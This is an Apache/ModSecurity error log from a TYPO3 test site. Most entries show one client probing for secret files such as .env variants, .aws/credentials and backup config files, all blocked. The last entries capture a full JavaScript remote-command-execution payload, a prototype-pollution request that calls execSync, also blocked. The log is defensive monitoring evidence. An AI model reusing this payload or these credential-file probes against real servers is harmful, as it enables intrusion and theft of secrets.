[Thu Dec 18 03:27:56.573673 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3gAAAAQ"]
[Thu Dec 18 03:28:05.581371 2025] [:error] [pid 813016] [client 45.148.10.160:53132] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNmtdoXgPZsLH_wMFNySgAAAAA"]
[Thu Dec 18 03:28:05.581617 2025] [:error] [pid 813016] [client 45.148.10.160:53132] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNmtdoXgPZsLH_wMFNySgAAAAA"]
[Thu Dec 18 03:28:05.581791 2025] [:error] [pid 813016] [client 45.148.10.160:53132] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNmtdoXgPZsLH_wMFNySgAAAAA"]
[Thu Dec 18 03:28:08.802397 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNmuEBkfFvq8O6HEbsoFAAAAAI"]
[Thu Dec 18 03:28:08.802635 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNmuEBkfFvq8O6HEbsoFAAAAAI"]
[Thu Dec 18 03:28:08.802826 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNmuEBkfFvq8O6HEbsoFAAAAAI"]
[Thu Dec 18 03:28:13.346273 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFQAAAAI"]
[Thu Dec 18 03:28:13.346506 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFQAAAAI"]
[Thu Dec 18 03:28:13.346682 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFQAAAAI"]
[Thu Dec 18 03:28:13.516401 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFgAAAAI"]
[Thu Dec 18 03:28:13.516624 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFgAAAAI"]
[Thu Dec 18 03:28:13.516793 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFgAAAAI"]
[Thu Dec 18 03:28:13.791599 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFwAAAAI"]
[Thu Dec 18 03:28:13.791815 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFwAAAAI"]
[Thu Dec 18 03:28:13.792018 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoFwAAAAI"]
[Thu Dec 18 03:28:13.972531 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoGAAAAAI"]
[Thu Dec 18 03:28:13.973511 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoGAAAAAI"]
[Thu Dec 18 03:28:13.973738 2025] [:error] [pid 813018] [client 45.148.10.160:53144] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUNmvUBkfFvq8O6HEbsoGAAAAAI"]
[Thu Dec 18 03:28:14.681141 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNmvr4E__wGzptGHintsAAAAAg"]
[Thu Dec 18 03:28:14.681404 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNmvr4E__wGzptGHintsAAAAAg"]
[Thu Dec 18 03:28:14.681581 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUNmvr4E__wGzptGHintsAAAAAg"]
[Thu Dec 18 03:28:14.925766 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNmvr4E__wGzptGHintsQAAAAg"]
[Thu Dec 18 03:28:14.925986 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNmvr4E__wGzptGHintsQAAAAg"]
[Thu Dec 18 03:28:14.926177 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUNmvr4E__wGzptGHintsQAAAAg"]
[Thu Dec 18 03:28:15.268424 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNmv74E__wGzptGHintsgAAAAg"]
[Thu Dec 18 03:28:15.268659 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNmv74E__wGzptGHintsgAAAAg"]
[Thu Dec 18 03:28:15.268830 2025] [:error] [pid 813370] [client 45.148.10.160:44232] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUNmv74E__wGzptGHintsgAAAAg"]
[Thu Dec 18 03:28:20.177496 2025] [authz_core:error] [pid 813370] [client 45.148.10.160:44232] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Thu Dec 18 03:28:26.908542 2025] [authz_core:error] [pid 813017] [client 45.148.10.160:59706] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Thu Dec 18 03:28:30.039920 2025] [authz_core:error] [pid 813359] [client 45.148.10.160:59726] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Dec 18 03:28:30.417883 2025] [authz_core:error] [pid 813359] [client 45.148.10.160:59726] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Thu Dec 18 03:28:30.636883 2025] [authz_core:error] [pid 813359] [client 45.148.10.160:59726] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Thu Dec 18 03:28:38.944207 2025] [authz_core:error] [pid 813019] [client 45.148.10.160:53524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Thu Dec 18 03:28:39.020195 2025] [authz_core:error] [pid 813019] [client 45.148.10.160:53524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Dec 18 03:28:39.057373 2025] [authz_core:error] [pid 813019] [client 45.148.10.160:53524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Dec 18 03:28:43.613594 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Thu Dec 18 03:28:43.727775 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Dec 18 03:28:43.783292 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Dec 18 03:28:44.062266 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Dec 18 03:28:44.135015 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Thu Dec 18 03:28:44.203420 2025] [authz_core:error] [pid 813020] [client 45.148.10.160:46050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Thu Dec 18 03:28:52.625871 2025] [authz_core:error] [pid 813016] [client 45.148.10.160:46054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Thu Dec 18 03:28:52.677261 2025] [authz_core:error] [pid 813016] [client 45.148.10.160:46054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Thu Dec 18 03:28:52.872804 2025] [authz_core:error] [pid 813016] [client 45.148.10.160:46054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Thu Dec 18 03:28:53.380746 2025] [:error] [pid 813018] [client 45.148.10.160:35660] [client 45.148.10.160] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNm5UBkfFvq8O6HEbsoHQAAAAI"]
[Thu Dec 18 03:28:53.380973 2025] [:error] [pid 813018] [client 45.148.10.160:35660] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNm5UBkfFvq8O6HEbsoHQAAAAI"]
[Thu Dec 18 03:28:53.381145 2025] [:error] [pid 813018] [client 45.148.10.160:35660] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUNm5UBkfFvq8O6HEbsoHQAAAAI"]
[Thu Dec 18 09:57:18.751752 2025] [:error] [pid 813016] [client 54.215.24.91:44608] [client 54.215.24.91] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUPB7toXgPZsLH_wMFNyrQAAAAA"]
[Thu Dec 18 09:57:18.752396 2025] [:error] [pid 813016] [client 54.215.24.91:44608] [client 54.215.24.91] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUPB7toXgPZsLH_wMFNyrQAAAAA"]
[Thu Dec 18 09:57:18.753667 2025] [:error] [pid 813016] [client 54.215.24.91:44608] [client 54.215.24.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUPB7toXgPZsLH_wMFNyrQAAAAA"]
[Thu Dec 18 09:57:18.753827 2025] [:error] [pid 813016] [client 54.215.24.91:44608] [client 54.215.24.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aUPB7toXgPZsLH_wMFNyrQAAAAA"]
